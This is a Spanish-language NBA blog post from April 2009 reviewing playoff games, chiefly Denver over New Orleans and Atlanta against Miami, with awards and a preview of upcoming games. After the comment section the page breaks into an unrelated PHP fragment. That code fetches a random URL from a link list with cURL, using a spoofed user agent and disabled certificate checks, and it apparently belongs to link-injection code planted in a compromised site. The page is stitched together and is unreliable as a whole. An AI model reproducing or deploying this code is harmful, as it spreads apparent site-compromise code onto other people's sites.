Playoffs (29/04/2009): Ponga un Billups en su vida

30 de April de 2009 por MagicJohnson32

melobillupsPor Txusma & MagicJohnson32

Había unanimidad al respecto: lo único que necesitaba Carmelo Anthony para alcanzar cotas más altas que una simple primera ronda de Playoffs era cabeza. O, en su defecto, un base como Billups. Aplíquese la premisa también a los Nuggets en general, que certificaron anoche su pase a segunda ronda, algo que no lograban desde 1994, y se enfrentarán a los Mavericks en semifinales de Conferencia. Denver confirmó su superioridad sobre unos Hornets depresivos, que anoche al menos sacaron un poco de orgullo y fueron capaces de plantar cara pese a la ausencia de Tyson Chandler. La emoción duró hasta el final del tercer cuarto, cuando los Nuggets consiguieron un parcial de 14-0 que sentenció el partido y las series. Melo firmó su mejor anotación en Playoffs, 34 puntos con 13 de 25 en tiros, 6 rebotes, 4 robos y 3 asistencias. Billups anotó mucho menos que en otras ocasiones pero generó juego para su equipo y, ante todo, mantuvo a Chris Paul bajo control. CP3 apenas ha podido salir de la sombra de Billups y anoche despidió la temporada con números decentes (12 puntos, 10 asistencias, 6 rebotes, 3 robos) pero un 5 de 16 en tiros y la sensación que nunca ha dominado la serie. West, con 24 puntos y 9 rebotes, fue el más efectivo para los de Byron Scott, mientras que en el equipo local tanto JR Smith (nuevamente letal desde el banquillo con 20 puntos, 5 de 8 en triples), como Kenyon Martin (15 puntos, 7 rebotes, 3 tapones) firmaron valiosas aportaciones.

heathawkstechsEl marcador final, 86-107, deja la diferencia media en las cuatro victorias de los Nuggets en unos escandalosos 37.5 puntos.

Tampoco están siendo especialmente emocionantes los partidos de la serie entre Heat y Hawks. La eliminatoria en sí mantiene todo el suspense, con un 3-2 para Atlanta tras su victoria anoche en el Philips Arena 91-106. Ninguno de los cinco partidos disputados hasta ahora se ha resuelto por menos de 10 puntos, y anoche no fue una excepción. Pero sí hubo novedades: parece que la cosa deriva hacia lo físico. Wade se llevó un par de golpes (el primero, fortuito con Josh Smith; el segundo, una falta de Solomon Jones, agarrón más que golpe, que acabó con 4 técnicas), pero lo peor fue para Horford, que recibió una durísima falta de James Jones, chocó con Wade, y tuvo que retirarse con una lesión de tobillo.

Esta baja se sumó a la de Marvin Williams, quien ya se había perdido el 4º partido. Sin embargo, entre Joe Johnson, Ronald Murray, Bibby y Josh Smith compensaron las ausencias y sumaron 85 puntos y 16 asistencias para dejar a su equipo a un solo triunfo de la clasificación.

El post partido estuvo marcado por una acción de Josh Smith, cuando a 4:20 para el final intentó finalizar un contraataque con un mate de concurso, el windmill pasándose el balón entre las piernas. Smith falló el mate y provocó el enfado de los Heat, quienes, en palabras de Wade, se sintieron “muy insultados”.

No nos engañemos: es una manera como cualquier otra de motivarse de cara al sexto partido y caldear el ambiente en Miami. ¿Wade al rescate? Es ahora o nunca.

PREMIOS

MVP: Poco a poco Carmelo Anthony ha ido encontrando su mejor juego y subiendo su nivel en cada partido de la serie frente a New Orleans. Ayer, abortó cualquier atisbo de reacción con 34 puntos, 24 de ellos en la segunda mitad.

Rookie: Primer buen partido de Michael Beasley en toda la serie. 18 puntos le convirtieron en la principal amenaza de la Heat tras Dwyane Wade.

bibbyjoshflipSorpresa: Ni Joe Johnson ni Mike Bibby ni Josh Smith. Ayer en los últimos minutos el máximo anotador de los Hawks fue Flip Murray que con 23 puntos, 5 rebotes y 3 asistencias se convirtió en el jugador más destacado de su equipo.

Decepción: Aunque no os lo creáis, Pedja Stojakovic ha jugado durante estos últimos días. Lo que sucede es que ha pasado más bien desapercibido. Sus 12 puntos de ayer son una buena muestra de su pobre rendimiento en las series.

Mayor esfuerzo en vano: Por un lado el omnipresente Dwyane Wade (29 puntos, aunque muchos con el partido ya decidido) y por el otro David West, el único junto con Posey que luchó en los Hornets, y consiguió 24 puntos y 9 rebotes.

RAZONES PARA TRASNOCHAR

¡Qué no se mueva nadie! Vuelve LA SERIE de estos Playoffs y con ella, otros dos partidos trascendentales.

– Boston @ Chicago (1.00h): A esta serie no le hace falta presentación. Primera oportunidad para los Celtics de finiquitar la eliminatoria en un United Center calentito por la polémica falta de Rondo en los últimos segundos del anterior partido.

– Orlando @ Philadelphia (1.30h): Sin Diwght Howard, sancionado por su codazo sobre Dalembert, parece improbable que los Magic ganen en Philadelphia por lo que ya podemos ir preparando las palomitas para el séptimo y definitivo partido.

– Portland @ Houston (3.30h): ¿Conseguirán Rudy & Co. forzar el séptimo partido? Difícil papeleta se les presenta y más si McMillan continúa con su elaborada táctica de “balones a Roy”.

Comenta

Un comentario a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    Ya dije yo que era buena idea que el halcón hubiese atacado a Josh Smith.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>